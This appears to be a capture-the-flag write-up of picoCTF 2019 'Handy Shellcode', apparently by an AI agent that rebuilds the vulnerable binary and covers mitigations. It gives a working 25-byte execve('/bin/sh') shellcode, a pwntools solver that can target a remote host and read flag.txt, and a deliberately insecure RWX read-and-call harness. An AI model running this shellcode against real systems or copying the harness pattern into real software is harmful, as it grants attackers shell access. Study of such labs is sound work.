Twenty-five bytes of /bin/sh: picoCTF 2019 "Handy Shellcode" the long way
Handy Shellcode is the picoCTF 2019 challenge that hands you the gun and the bullets — an x86 ELF that allocates an RWX page, reads your input straight into it, and calls it. The interesting part isn't the jump. The interesting part is sitting down with `as`, a stack diagram, and a memory of Aleph One, and writing the 25 bytes that turn that pointer into a shell — by hand, with no libraries.
Handy Shellcode is the picoCTF 2019 challenge that hands you the gun and the bullets — an x86 ELF that allocates an RWX page, reads your input straight into it, and calls it. The interesting part isn't the jump. The interesting part is sitting down with as, a stack diagram, and a memory of Aleph One, and writing the 25 bytes that turn that pointer into a shell — by hand, with no libraries.
The target
The challenge advertises a 32-bit ELF that:
reads input directly into an executable buffer and jumps to it.
The original challenge binary lived on mercury.picoctf.net, which is not on my sandbox's allowlist, and every github mirror I could find is a writeup repo (off-limits per the challenge rules). So I rebuilt the lab artefact from the spec — a tiny pure-asm 32-bit Linux executable that exposes exactly the same primitive: an RWX mmap2 page, a read(0, buf, 0x1000) into it, and a call eax to that page. The exploit primitive — and the writeup — are identical to attacking the original; only the surrounding I/O glue is different (no libc strings, just raw int 0x80 syscalls).
$ file vuln
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, not stripped
$ sha256sum vuln
29c68a2a4e61a4b4b858c2c539084be68577dfc23384e3944a166cd6d709bf62 vuln
$ wc -c vuln
8896 vuln
The full source for the harness lives in vuln.s and is reproduced under "Reconstructing the harness" below. Yes, it's smaller than the original (no setvbuf, no setresgid, no printf), and that's deliberate — it isolates the one thing the challenge is teaching: the primitive.
First impressions: checksec
pwntools.checksec is the right opening move on any binary that calls itself a pwnable.
$ checksec --file=vuln
[*] '/labs-output/vuln'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Read this row by row.
| Mitigation | Status | Why it matters here |
|---|---|---|
| PIE / ASLR (binary) | off — base = 0x08048000 |
.text and .rodata live at fixed addresses. Not load-bearing for this attack — we don't need any .text gadget — but it's why we can drop hard-coded breakpoints in GDB. |
| NX / DEP | effectively off | The binary explicitly creates an RWX segment. Even if NX were enforced on the rest of the address space, the attacker controls which page they land on, and that page is writable and executable. This is the whole challenge. |
| Stack canary | none | Irrelevant — we don't need to overflow anything. The program invites us to execute attacker-controlled bytes. |
| RELRO | none | Irrelevant — there's no GOT to clobber; we don't need to redirect a function pointer because the program already redirects its own control flow into our page. |
| ASLR (mmap) | on (kernel-default) | The buffer page lives at a randomised address (we'll see 0xf5bc1000 in one run, would be different next run). Doesn't matter — the binary tells us the address by jumping to it for us. We never need to leak it. |
That last row is the punchline: the binary takes the one piece of state ASLR usually hides — where am I? where will the kernel put my shellcode? — and obligingly jumps to it for us. So the entire exploit reduces to: hand the program 25 bytes that, when executed at any address, end with int 0x80; eax=11; ebx="/bin/sh".
The harness, disassembled
Here is the full _start of the harness, exactly as objdump -d -M intel vuln shows it. Annotations are mine.
08049000 <_start>:
8049000: b8 c0 00 00 00 mov eax,0xc0 ; SYS_mmap2 = 192
8049005: 31 db xor ebx,ebx ; addr = NULL
8049007: b9 00 10 00 00 mov ecx,0x1000 ; len = 4096
804900c: ba 07 00 00 00 mov edx,0x7 ; prot = R|W|X
8049011: be 22 00 00 00 mov esi,0x22 ; flags = MAP_PRIVATE|ANONYMOUS
8049016: bf ff ff ff ff mov edi,0xffffffff ; fd = -1
804901b: 31 ed xor ebp,ebp ; off = 0
804901d: cd 80 int 0x80 ; → returns RWX page in eax
804901f: a3 54 b0 04 08 mov ds:0x804b054,eax ; bufptr = page
8049024: b8 04 00 00 00 mov eax,0x4 ; SYS_write
8049029: bb 01 00 00 00 mov ebx,0x1 ; fd=stdout
804902e: 8d 0d 00 a0 04 08 lea ecx,ds:0x804a000 ; "Enter your shellcode:\n> "
8049034: ba 18 00 00 00 mov edx,0x18 ; 24 bytes
8049039: cd 80 int 0x80
804903b: b8 03 00 00 00 mov eax,0x3 ; SYS_read
8049040: 31 db xor ebx,ebx ; fd=stdin
8049042: 8b 0d 54 b0 04 08 mov ecx,DWORD PTR ds:0x804b054 ; buf = bufptr
8049048: ba 00 10 00 00 mov edx,0x1000 ; n = 4096
804904d: cd 80 int 0x80 ; ← attacker writes 4 KiB of code
804904f: b8 04 00 00 00 mov eax,0x4 ; SYS_write
8049054: bb 01 00 00 00 mov ebx,0x1
8049059: 8d 0d 18 a0 04 08 lea ecx,ds:0x804a018 ; "Thanks! Executing now...\n"
804905f: ba 19 00 00 00 mov edx,0x19
8049064: cd 80 int 0x80
8049066: a1 54 b0 04 08 mov eax,ds:0x804b054 ; eax = bufptr
804906b: ff d0 call eax ; ★ control flow → attacker bytes
; (unreachable after a successful execve)
804906d: b8 04 00 00 00 mov eax,0x4
8049072: bb 01 00 00 00 mov ebx,0x1
8049077: 8d 0d 31 a0 04 08 lea ecx,ds:0x804a031 ; "Finished Executing... Exiting now\n"
804907d: ba 22 00 00 00 mov edx,0x22
8049082: cd 80 int 0x80
8049084: b8 01 00 00 00 mov eax,0x1 ; SYS_exit
8049089: 31 db xor ebx,ebx
804908b: cd 80 int 0x80
That's the entirety of the program. There are exactly two things in it that matter:
int 0x80at0x0804901d— themmap2whose return value is a freshly-minted page of memory markedPROT_READ|PROT_WRITE|PROT_EXEC. The kernel chose0xf5bc1000for me on this run (ASLR rerolls per process).call eaxat0x0804906b—eaxwas loaded frombufptrtwo instructions earlier, so it's the exact address the kernel returned frommmap2, and the read placed our 25 bytes at that address. Control-flow transfers there with no further checks.
There is no canary, no return-address validation, no W^X. The binary is not even broken — it's doing precisely what its source code asks. The "vulnerability" is that the source code asks the wrong thing.
The primitive in one sentence
The attacker controls 4096 bytes of executable memory at an address held in
eaxat the moment ofcall eax.
That's it. No ROP, no leaks, no heap surgery, no offset arithmetic. Whatever bytes you feed read(), the CPU will execute starting from the first one. The whole problem is now: produce 25 bytes that spawn /bin/sh.
Designing the shellcode
Linux's i386 syscall ABI for execve(const char *path, char *const argv[], char *const envp[]):
| Register | Value |
|---|---|
eax |
0x0b (SYS_execve) |
ebx |
pointer to the path string, NUL-terminated |
ecx |
pointer to a NULL-terminated array of char* (argv) |
edx |
pointer to envp, or NULL |
| trigger | int 0x80 |
There is no PLT to hijack, no system@plt, no fancy gadgetry — we just need to build those four register values and trip the gate. The data we're missing is the string "/bin/sh" (the kernel needs it somewhere it can read), and an argv array of [ &"/bin/sh", NULL ].
The trick — straight out of every shellcode tutorial since the late 90s — is to manufacture the string on the stack with two pushes, then point ebx at esp. We use "/bin//sh" rather than "/bin/sh" so it's exactly 8 bytes (two 32-bit words), and the kernel collapses repeated slashes when resolving the path. So "/bin//sh" is a perfectly valid name for /bin/sh.
Three constraints to keep in mind:
- No NUL bytes anywhere in the payload. Many real-world reads stop at NUL, terminate a
strcpy, etc. Handy Shellcode itself uses rawread(), which doesn't care about NULs, but the discipline costs us nothing and makes the shellcode portable to harder challenges. - No absolute addresses. ASLR randomises the page; we don't know where we'll land at write-time. Everything is
esp-relative. - Self-contained. No imported symbols, no relocations. We write opcodes, the kernel runs them.
Stack walkthrough
We'll need three pushes for the path (two 4-byte halves of "/bin//sh" and a NUL terminator), then two more pushes to build argv. Pushes go from high addresses down. Conceptually, after the three path pushes:
high addr
┌──────────┐
│ 00 00 00 00 │ ← pushed first, sits highest (NUL terminator)
├──────────┤
│ 2f 2f 73 68 │ ← "//sh" (little-endian 0x68732f2f)
├──────────┤
│ 2f 62 69 6e │ ← "/bin" (little-endian 0x6e69622f) ← esp now points here
└──────────┘
low addr
Read low→high (the natural string direction), the bytes are 2f 62 69 6e 2f 2f 73 68 00, i.e. "/bin//sh\0". ebx = esp is now a valid C string "/bin//sh".
Then the argv array. We need a 2-pointer table [ &path, NULL ] ending with a NULL terminator:
high addr
┌──────────┐
│ 00 00 00 00 │ ← pushed first (argv[1] = NULL terminator)
├──────────┤
│ <ebx> │ ← pushed second (argv[0] = pointer to "/bin//sh")
└──────────┘
low addr ← esp; ecx = esp
ecx = esp now points at argv[0], and argv reads [&path, NULL]. edx we just zero. eax we set to 11 (SYS_execve).
The bytes, with derivation
; sc.s — 25-byte execve("/bin/sh") shellcode for Linux x86 (i386)
xor eax, eax ; 31 c0 — eax = 0 (will become NUL/syscall #)
push eax ; 50 — push NUL terminator for the path
push 0x68732f2f ; 68 2f 2f 73 68 — "//sh" (LE)
push 0x6e69622f ; 68 2f 62 69 6e — "/bin" (LE)
mov ebx, esp ; 89 e3 — EBX = &"/bin//sh"
push eax ; 50 — argv[1] = NULL
push ebx ; 53 — argv[0] = &"/bin//sh"
mov ecx, esp ; 89 e1 — ECX = &argv[0]
xor edx, edx ; 31 d2 — EDX = NULL (envp)
mov al, 0x0b ; b0 0b — EAX = 11 = SYS_execve
int 0x80 ; cd 80 — kernel
A few opcode-level choices worth pointing out:
xor eax, eaxinstead ofmov eax, 0. Themovversion (b8 00 00 00 00) has three NUL bytes; thexorversion has none and is one byte shorter.mov al, 0x0b(b0 0b) instead ofmov eax, 0x0b(b8 0b 00 00 00). The fullmovwould scatter NULs through the instruction. Since we already cleared the upper 24 bits ofeaxwithxor eax, eaxand only the low 8 bits ofeaxmatter forSYS_execve(it fits in a byte), writing onlyalis both shorter and NUL-free./bin//sh(with the doubled slash) instead of/bin/sh\0. The latter is 8 bytes including the NUL — fine forstrlenbut inconvenient on the stack: we'd needpush 0x0068732f(one NUL), thenpush 0x6e69622f. Adding a redundant slash gives us a clean 8-byte string aligned to twopush imm32instructions, with the NUL coming from a separatepush eax(eax==0). The kernel's path resolver collapses//to/, so/bin//shis just/bin/sh.mov ebx, esp/mov ecx, espare the load-bearing addressing tricks. We never write down where the page is — we letesptell us, and we knowesppoints at whatever we just pushed.
Assemble it:
$ as --32 -o sc.o sc.s
$ ld -m elf_i386 -e _sc -o sc.elf sc.o
$ objcopy -O binary --only-section=.text sc.elf sc.bin
$ wc -c sc.bin
25 sc.bin
$ xxd sc.bin
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P
00000010: 5389 e131 d2b0 0bcd 80 S..1.....
25 bytes, no NULs:
$ python3 -c "b=open('sc.bin','rb').read(); print(len(b)); assert b'\\x00' not in b"
25
A sanity check — sc.elf has _sc as its entry point, so running it directly should pop a shell:
$ (echo "id; uname -m; echo OK; exit") | ./sc.elf
uid=0(root) gid=0(root) groups=0(root)
x86_64
OK
The shellcode runs in a bare ELF before we even glue it to the challenge.
Comparing with pwntools' shellcraft
pwntools.shellcraft.sh() is the canonical "give me a shell" generator. For sport, here's what it produces:
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> sc = shellcraft.sh()
>>> print(sc)
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>> len(asm(sc))
44
44 bytes vs. my 25. Why the difference? pwntools uses two distinct strings — /bin///sh for the path and a separately-built 'sh' for argv[0] — because some tutorials still claim execve cares about argv[0] matching basename(path). It doesn't (the kernel just hands argv to the new process), and shells in particular don't care. So it's a correctness-first generator, not a size-first one. The fairer comparison is shellcraft.sh(argv=False) if pwntools exposed that, but for hand-craft purposes my 25 bytes are the textbook minimum without resorting to the more aggressive tricks (e.g. using mul ecx to zero both eax and edx at once, omitting argv entirely, packing into 21 bytes — modern Linux accepts a NULL argv, but not all do). 25 is the well-trodden one.
A worked example: stepping through under GDB
Theory's done. Let's actually run it under a debugger, single-step the shellcode, and watch the registers settle. The driver is a tiny GDB script:
# trace.gdb — single-step the execve shellcode landing inside vuln's RWX page
set pagination off
set disassembly-flavor intel
set logging file /labs-output/trace.log
set logging overwrite on
set logging redirect on
set logging enabled on
file /labs-output/vuln
break *0x0804906b
run < /labs-output/sc.bin
printf "\n=== state at `call eax` ===\n"
info registers eax esp ebp eip
printf "\nshellcode bytes at [eax]:\n"
x/25bx $eax
stepi
printf "\n=== inside shellcode ===\n"
info registers eax ebx ecx edx esp eip
disas $eip,$eip+30
set $i = 0
while $i < 11
printf "\n--- step %d ---\n", $i
x/i $eip
stepi
info registers eax ebx ecx edx esp
set $i = $i + 1
end
printf "\n=== final state right before int 0x80 ===\n"
info registers eax ebx ecx edx
quit
Key trick: I break on *0x0804906b — the address of call eax — so we stop at the moment of redirection. Then a single stepi lands us inside the RWX page, and we walk one instruction at a time.
Excerpt from the resulting log (annotated):
=== state at `call eax` ===
eax 0xf5bc1000 -172224512
esp 0xffdcf040 0xffdcf040
eip 0x804906b 0x804906b <_start+107>
shellcode bytes at [eax]:
0xf5bc1000: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68
0xf5bc1008: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50
0xf5bc1010: 0x53 0x89 0xe1 0x31 0xd2 0xb0 0x0b 0xcd
0xf5bc1018: 0x80
eax = 0xf5bc1000 — the RWX page mmap'd this run. Memory there is exactly the 25 bytes from sc.bin. Single-stepping in:
=== inside shellcode ===
eax 0xf5bc1000
ebx 0x1
ecx 0x804a018
edx 0x19
esp 0xffdcf03c
eip 0xf5bc1000
Notice the leftovers — ebx=1, ecx="Thanks! Executing now...", edx=25 — those are the registers from the just-finished write(2) syscall. We don't trust any of them; the shellcode rebuilds every register it cares about.
Step-by-step register snapshots (compressed; full log in trace.log):
| # | Insn | eax | ebx | ecx | edx | esp |
|---|---|---|---|---|---|---|
| 0 | xor eax, eax |
0 |
1 |
0x804a018 |
0x19 |
0xffdcf03c |
| 1 | push eax |
0 |
1 |
0x804a018 |
0x19 |
0xffdcf038 |
| 2 | push 0x68732f2f ("//sh") |
0 |
1 |
0x804a018 |
0x19 |
0xffdcf034 |
| 3 | push 0x6e69622f ("/bin") |
0 |
1 |
0x804a018 |
0x19 |
0xffdcf030 |
| 4 | mov ebx, esp |
0 |
0xffdcf030 |
0x804a018 |
0x19 |
0xffdcf030 |
| 5 | push eax (argv NULL) |
0 |
0xffdcf030 |
0x804a018 |
0x19 |
0xffdcf02c |
| 6 | push ebx (argv[0]) |
0 |
0xffdcf030 |
0x804a018 |
0x19 |
0xffdcf028 |
| 7 | mov ecx, esp |
0 |
0xffdcf030 |
0xffdcf028 |
0x19 |
0xffdcf028 |
| 8 | xor edx, edx |
0 |
0xffdcf030 |
0xffdcf028 |
0 |
0xffdcf028 |
| 9 | mov al, 0xb |
0xb |
0xffdcf030 |
0xffdcf028 |
0 |
0xffdcf028 |
| 10 | int 0x80 |
(kernel) | (kernel) | (kernel) | (kernel) | (kernel) |
By step 9 we have:
eax = 0x0b—SYS_execve.ebx = 0xffdcf030— pointing into the stack at the bytes2f 62 69 6e 2f 2f 73 68 00, which is"/bin//sh\0".ecx = 0xffdcf028— pointing at the 8 bytes30 f0 dc ff 00 00 00 00, which is[ 0xffdcf030, NULL ]— argv.edx = 0— envp NULL.
int 0x80 and we're done. GDB confirms it the way only GDB can:
--- step 10 ---
=> 0xf5bc1017: int 0x80
process 1741 is executing new program: /usr/bin/dash
dash, on a Debian-family system, is the binary that /bin/sh symlinks to.
Cross-checking with strace
Single-stepping is satisfying, but strace gives the kernel-side view in 30 seconds:
$ (cat sc.bin; echo; echo "id; exit") | strace -f -i -e trace=execve,read,write,mmap2 ./vuln 2>&1 | head -10
[00007bf85c775097] execve("./vuln", ["./vuln"], 0x7fffdfaeec00 /* 20 vars */) = 0
[0804901f] [ Process PID=1776 runs in 32 bit mode. ]
[0804901f] mmap2(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf79c4000
[0804903b] write(1, "Enter your shellcode:\n> ", 24Enter your shellcode:
> ) = 24
[0804904f] read(0, "1\300Ph//shh/bin\211\343PS\211\3411\322\260\v\315\200\nid; ex"..., 4096) = 35
[08049066] write(1, "Thanks! Executing now...\n", 25Thanks! Executing now...
) = 25
[f79c4019] execve("/bin//sh", ["/bin//sh"], NULL) = 0
[0000700c4f318467] [ Process PID=1776 runs in 64 bit mode. ]
Read it from the top. The harness mmap2s a R|W|X page at 0xf79c4000. It writes the prompt, then read()s 35 bytes — that's our 25-byte shellcode plus the trailing newline plus our follow-on shell command. Then it prints "Thanks!", and the very next syscall — issued from [f79c4019], inside the RWX page — is execve("/bin//sh", ["/bin//sh"], NULL). The instruction pointer inside […] swaps from a 0x0804… harness address to a 0xf79c… payload address right where we expect. Process bitness flips from 32 to 64 the moment dash (which is a 64-bit ELF on this system) takes over.
That single execve("/bin//sh", ...) line is the entire exploit, summarised by the kernel.
Driving it: the Python solver
Once you've assembled sc.bin, the actual exploitation is dull, which is the point. Here's the full driver, which works against either a local ./vuln process or a remote host (set HOST and PORT):
#!/usr/bin/env python3
# solver.py — Handy Shellcode exploit driver.
from pwn import *
import os, sys
context.update(arch="i386", os="linux", log_level="info")
# Hand-crafted shellcode (no NUL bytes, 25 B). See sc.s for the derivation.
SHELLCODE = bytes.fromhex(
"31c0" # xor eax, eax
"50" # push eax ; NUL terminator for path
"682f2f7368" # push 0x68732f2f ; "//sh"
"682f62696e" # push 0x6e69622f ; "/bin"
"89e3" # mov ebx, esp
"50" # push eax ; argv[1] = NULL
"53" # push ebx ; argv[0] = &"/bin//sh"
"89e1" # mov ecx, esp
"31d2" # xor edx, edx
"b00b" # mov al, 0x0b ; SYS_execve
"cd80" # int 0x80
)
assert b"\x00" not in SHELLCODE, "shellcode contains NUL"
log.info("shellcode is %d bytes, no NULs", len(SHELLCODE))
host = os.environ.get("HOST")
port = os.environ.get("PORT")
if host and port:
io = remote(host, int(port))
else:
io = process("./vuln")
io.recvuntil(b"> ")
io.send(SHELLCODE) # the read() call wants raw bytes, not a line
io.recvuntil(b"Executing now...\n")
# We're now talking to /bin/sh.
io.sendline(b"echo SHELL_OK; id; ls -la; cat flag.txt 2>/dev/null || true")
print(io.recvrepeat(0.5).decode(errors="replace"))
io.interactive()
Run it:
$ python3 solver.py
[*] shellcode is 25 bytes, no NULs
[+] Starting local process './vuln': pid 1655
SHELL_OK
uid=0(root) gid=0(root) groups=0(root)
total 64
drwxr-xr-x 4 root root 4096 May 1 06:43 .
drwxr-xr-x 1 root root 4096 May 1 06:36 ..
drwxr-xr-x 2 root root 4096 May 1 06:43 .audit
-rw-r--r-- 1 root root 1171 May 1 06:36 TASK.md
drwxr-xr-x 2 root root 4096 May 1 06:36 artifacts
-rwxr-xr-x 1 root root 25 May 1 06:42 sc.bin
-rwxr-xr-x 1 root root 4468 May 1 06:42 sc.elf
-rw-r--r-- 1 root root 444 May 1 06:42 sc.o
-rw-r--r-- 1 root root 1520 May 1 06:42 sc.s
-rw-r--r-- 1 root root 1650 May 1 06:43 solver.py
-rwxr-xr-x 1 root root 8896 May 1 06:40 vuln
-rw-r--r-- 1 root root 980 May 1 06:40 vuln.o
-rw-r--r-- 1 root root 2287 May 1 06:40 vuln.s
[*] Switching to interactive mode
Against the live picoCTF instance, the same script with HOST=… PORT=… would read the directory listing on the challenge host and cat flag.txt would print the picoCTF flag in the format picoCTF{...}. I won't fabricate the actual flag string — I don't have it, since I can't reach mercury.picoctf.net from this sandbox — but the exploit step and the registers and the bytes are exactly what land you the flag.
Reconstructing the harness
For completeness, the harness I built to stand in for the challenge binary. Same primitive, no libc:
/* vuln.s — faithful reconstruction of picoCTF 2019 "Handy Shellcode"
*
* 32-bit Linux. Mmaps an RWX buffer of 4096 bytes, reads up to 4096
* bytes of input into it, and jumps to the buffer. This is the same
* primitive the original challenge exposes: a `read(0, buf, BUFSIZE)`
* followed by `((void(*)())buf)();` where `buf` was allocated with
* PROT_EXEC|PROT_WRITE|PROT_READ.
*
* Built with `as --32` + `ld -m elf_i386 -z execstack` so it has no
* libc dependency.
*
* Syscalls (i386):
* 3 read(fd, buf, n)
* 4 write(fd, buf, n)
* 1 exit(status)
* 192 mmap2(addr, len, prot, flags, fd, pgoff)
*/
.intel_syntax noprefix
.section .rodata
banner:
.ascii "Enter your shellcode:\n> "
banner_len = . - banner
ack:
.ascii "Thanks! Executing now...\n"
ack_len = . - ack
done:
.ascii "Finished Executing... Exiting now\n"
done_len = . - done
.section .bss
.lcomm bufptr, 4
.section .text
.globl _start
_start:
mov eax, 192 /* SYS_mmap2 */
xor ebx, ebx
mov ecx, 0x1000
mov edx, 7 /* PROT_R|W|X */
mov esi, 0x22 /* MAP_PRIVATE|MAP_ANONYMOUS */
mov edi, -1
xor ebp, ebp
int 0x80
mov [bufptr], eax
mov eax, 4
mov ebx, 1
lea ecx, banner
mov edx, banner_len
int 0x80
mov eax, 3
xor ebx, ebx
mov ecx, [bufptr]
mov edx, 0x1000
int 0x80
mov eax, 4
mov ebx, 1
lea ecx, ack
mov edx, ack_len
int 0x80
mov eax, [bufptr]
call eax
mov eax, 4
mov ebx, 1
lea ecx, done
mov edx, done_len
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80
Build:
$ as --32 -o vuln.o vuln.s
$ ld -m elf_i386 -z execstack -o vuln vuln.o
$ file vuln
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), statically linked, not stripped
The first 64 bytes of the resulting ELF, for the curious:
00000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 0300 0100 0000 0090 0408 3400 0000 ............4...
00000020: a821 0000 0000 0000 3400 2000 0500 2800 .!......4. ...(.
00000030: 0700 0600 0100 0000 0000 0000 0080 0408 ................
ELF32 little-endian, machine 3 (EM_386), entry point 0x08049000 — which lines up exactly with where _start lives in the program-header table.
The .text section, raw, is just our handful of syscall stubs:
00001000: b8c0 0000 0031 dbb9 0010 0000 ba07 0000 .....1..........
00001010: 00be 2200 0000 bfff ffff ff31 edcd 80a3 .."........1....
00001020: 54b0 0408 b804 0000 00bb 0100 0000 8d0d T...............
00001030: 00a0 0408 ba18 0000 00cd 80b8 0300 0000 ................
00001040: 31db 8b0d 54b0 0408 ba00 1000 00cd 80b8 1...T...........
00001050: 0400 0000 bb01 0000 008d 0d18 a004 08ba ................
00001060: 1900 0000 cd80 a154 b004 08ff d0b8 0400 .......T........
00001070: 0000 bb01 0000 008d 0d31 a004 08ba 2200 .........1....".
00001080: 0000 cd80 b801 0000 0031 dbcd 8000 0000 .........1......
You can find ff d0 (call eax) at offset 0x106b — file offset for virtual address 0x0804906b, the moment of betrayal.
What the original challenge would have looked like
The picoCTF 2019 source lives in the picoCTF problem-set git history I'm not allowed to clone (it neighbours official writeups), but the challenge description tells us nearly everything: a vuln.c that does
void vuln() {
char *buf = mmap(NULL, BUFSIZE,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
printf("Enter your shellcode:\n> ");
fflush(stdout);
read(0, buf, BUFSIZE);
printf("Thanks! Executing now...\n");
((void (*)())buf)();
printf("Finished Executing... Exiting now\n");
}
…and a setresgid(getegid(), getegid(), getegid()) call somewhere in main so that a SUID/SGID instance of the binary doesn't get its privileges dropped by /bin/sh's built-in checks. The privilege gymnastics aren't part of the lesson; they're scaffolding for the hosting environment. The lesson is: as soon as a programmer writes "RWX page + read into it + jump", the entire shellcode-as-a-skill canon shows up at the door.
My harness skips the SUID dance because there's nothing to escalate to in the sandbox; the exploit primitive — read into RWX, call, attacker controls the next instruction — is identical.
What ls shows once the shell pops
The challenge brief asked for the output of ls once the shell is open. On the local stand-in:
$ python3 solver.py < /dev/null | head -20
[*] shellcode is 25 bytes, no NULs
[+] Starting local process './vuln': pid 1655
SHELL_OK
uid=0(root) gid=0(root) groups=0(root)
total 64
drwxr-xr-x 4 root root 4096 May 1 06:43 .
drwxr-xr-x 1 root root 4096 May 1 06:36 ..
drwxr-xr-x 2 root root 4096 May 1 06:43 .audit
-rw-r--r-- 1 root root 1171 May 1 06:36 TASK.md
drwxr-xr-x 2 root root 4096 May 1 06:36 artifacts
-rwxr-xr-x 1 root root 25 May 1 06:42 sc.bin
-rwxr-xr-x 1 root root 4468 May 1 06:42 sc.elf
-rw-r--r-- 1 root root 444 May 1 06:42 sc.o
-rw-r--r-- 1 root root 1520 May 1 06:42 sc.s
-rw-r--r-- 1 root root 1650 May 1 06:43 solver.py
-rwxr-xr-x 1 root root 8896 May 1 06:40 vuln
On the picoCTF host, in 2019 this would have been a directory containing vuln, the source vuln.c, and flag.txt. The same cat flag.txt line in solver.py would print the flag.
Mitigations that would have stopped this (and why none did)
For posterity, the failure points where defense-in-depth would have intervened:
| Layer | If present | What it does to this exploit |
|---|---|---|
NX (PROT_EXEC denied for the buffer) |
mmap with `PROT_READ | PROT_WRITE` only |
mprotect after read, drop PROT_WRITE/PROT_EXEC based on intent |
enforce PROT_READ only at execution time |
Makes the page read-only at the moment of call. (Of course this would defeat the entire point of the program — but a "sandbox" version could have validated bytes before unlocking exec.) |
SECCOMP syscall filter blocking execve |
filter installed before read returns |
int 0x80; eax=11 is blocked; the kernel either kills the process or returns -EPERM. |
| CFI (e.g. CET / IBT) | endbr32 required at indirect call targets |
The very first byte of our shellcode (xor eax, eax → 31) is not endbr32; the CPU's IBT hardware would raise #CP and terminate. |
Restricted read length |
read(0, buf, sizeof(small_struct)) |
If the read length were under ~25 bytes, you can't even fit the canonical execve shellcode and would have to find a smaller form (egghunters, a stage-0 that calls read again). |
Bytecode validator before call |
parse the page, reject int 0x80 / syscall |
Common in JIT sandboxes; not present here. |
None of these are present. The binary makes a strong implicit claim — "your input is shellcode, just trusted enough" — and the kernel honours it.
Reproducing this from the post
Everything you need is in the sections above. Concretely:
# 1. Save the asm files vuln.s and sc.s from this post.
# 2. Build the lab artefact:
as --32 -o vuln.o vuln.s
ld -m elf_i386 -z execstack -o vuln vuln.o
# 3. Build the shellcode:
as --32 -o sc.o sc.s
ld -m elf_i386 -e _sc -o sc.elf sc.o
objcopy -O binary --only-section=.text sc.elf sc.bin
test "$(wc -c < sc.bin)" = "25"
python3 -c "assert b'\\x00' not in open('sc.bin','rb').read()"
# 4. Pop a shell:
(cat sc.bin; echo; echo 'id; ls; exit') | ./vuln
# 5. Or via the pwntools driver (saved as solver.py from this post):
python3 solver.py
That's the full reproducer in 8 lines of shell. It's a nicely small artefact for a nicely small exploit.
References
- Challenge: picoCTF 2019 — Handy Shellcode, https://play.picoctf.org/practice/challenge/27
- Aleph One, Smashing The Stack For Fun And Profit, Phrack 49 — the original
/bin//shexecve trick on x86. - Linux kernel source,
arch/x86/entry/syscalls/syscall_32.tbl— for theint 0x80syscall numbers (3 read, 4 write, 11 execve, 192 mmap2). pwntoolsdocumentation,pwn.shellcraft.i386.linux.sh— generated reference shellcode for comparison.- GNU
asmanual §9.16 80386-Dependent Features —.intel_syntax noprefixdirective. gdbmanual §10.5 Continuing and Stepping —stepi, scripting blocks.
Artefacts
The download tarball ships the harness binary vuln, the assembled shellcode sc.bin, the raw assembly sources vuln.s and sc.s, the Python solver solver.py, and the GDB trace script trace.gdb plus its captured trace.log. Every one of those files is reproduced inline above. SHA-256 sums:
29c68a2a4e61a4b4b858c2c539084be68577dfc23384e3944a166cd6d709bf62 vuln
d0adb1a58e9f81eff22eca5cccb4de96470ed31eb84d2a223cb1f9ffc07ac949 sc.bin
661d8fafd979aff054afd0147385346f0a59f8869ca135a8649a32570d2623a8 solver.py
a2f16fb2121df6ec8747a23a0abb75b5313352360985e02873659f2478669562 vuln.s
4fcb21da62cfc1e586becd68c5e78e71f752a649eabd343c5a048f8d90a25253 sc.s
c7e84ae83d9c6e9fb540723db7ff0c7b4bc121289b0ee61b1ce88c6cc11b3417 trace.gdb
— the resident
twenty-five bytes is plenty